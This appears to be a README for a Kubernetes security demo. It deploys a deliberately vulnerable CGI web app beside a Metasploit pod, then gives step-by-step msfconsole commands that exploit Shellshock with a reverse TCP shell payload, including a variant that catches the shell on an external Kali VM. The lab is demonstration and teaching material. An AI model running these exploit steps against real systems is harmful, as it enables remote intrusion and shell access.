• Requirements
• Installation
• Demo
• Cleanup
• Attacker from external VM
• Tips

• Helm3
• Highly recommended:]K9S
• If you want to demo using the hard way: kubectl

Make sure you are using Helm3 client

# Install our sushi restaurant web page
helm install -f cpx-sushi/values.yaml --namespace sushi --create-namespace sushi-restaurant cpx-sushi
# Install the attacker client
helm install -f attacker-cpx/values.yaml --namespace attacker --create-namespace attacker-client attacker-cpx
# Ignore the stdout printed by helm

Run K9S, check the namespace 'vulnerable' and verify there are 2 pods running there:

• metasploit-client: We will use this as the "attacker machine"
• vuln-app-cpx-helm-vulnerable: We will use this as the "victim machine"

Verify the vulnerable namespace has a LoadBalancer service which is has an external-IP assigned. Write down this value as we will need it during the attack phase. This will allow attacking the application even from outside the K8S cluster.

Start a shell within the metasploit container and execute:

cd /usr/src/metasploit-framework
./msfconsole -r docker/msfconsole.rc -y $APP_HOME/config/database.yml
# The metasploit framework shall start...

Using the metasploit framework we will exploit the apache_mod_cgi_bash_env_exec:

search shellshock
# Locate the module with the name apache_mod_cgi_bash_env
use exploit/multi/http/apache_mod_cgi_bash_env_exec
# Check available options
show options
# Set RHOST to the external IP of the vuln-app-cpx-helm-vulnerable
set rhost <external-ip>
# You could also use the internal cluster IP since the metasploit pod has visibility of the vulnerable pod
set rport 80
set targeturi /cgi-bin/menu
# Set the payload
set payload linux/x86/shell/reverse_tcp
# Check if target is vulnerable
check
# Exploit vulnerability
exploit

At this point you may get multiple sessions opened in background mode. List them and use one of them to exploit the reverse tcp shell:

#List sessions
sessions
# Run interactive shell in session #1
sessions -i 1
# Start running commands
whoami
ls -la

#Cleanup

helm uninstall sushi-restaurant -n sushi
helm uninstall attacker-client -n attacker

In order to setup the attacker machine from an external VM running a distribution like Kali Linux, you will need to assign a public IP address to this machine so that it is reachable. Additionally, the port where the the reverse shell connection will be established needs to be allowed for input connections (i.e: In AWS the security group of the EC2 instance needs to allow input connections to port )

How to run the exploit is very similar. First ssh into the Kali Linux machine:

# Start metasploit console
msfconsole
# Follow the same steps that we already described
# We will need to set a few extra options
set lhost <public-ip-of-vm>
set lport <port-that-we-allow-input-connections>
# set lport 4444
check
exploit

• Use K9S client to demonstrate interactively how to perform the attack, it will save sometime if you need to run kubectl all the time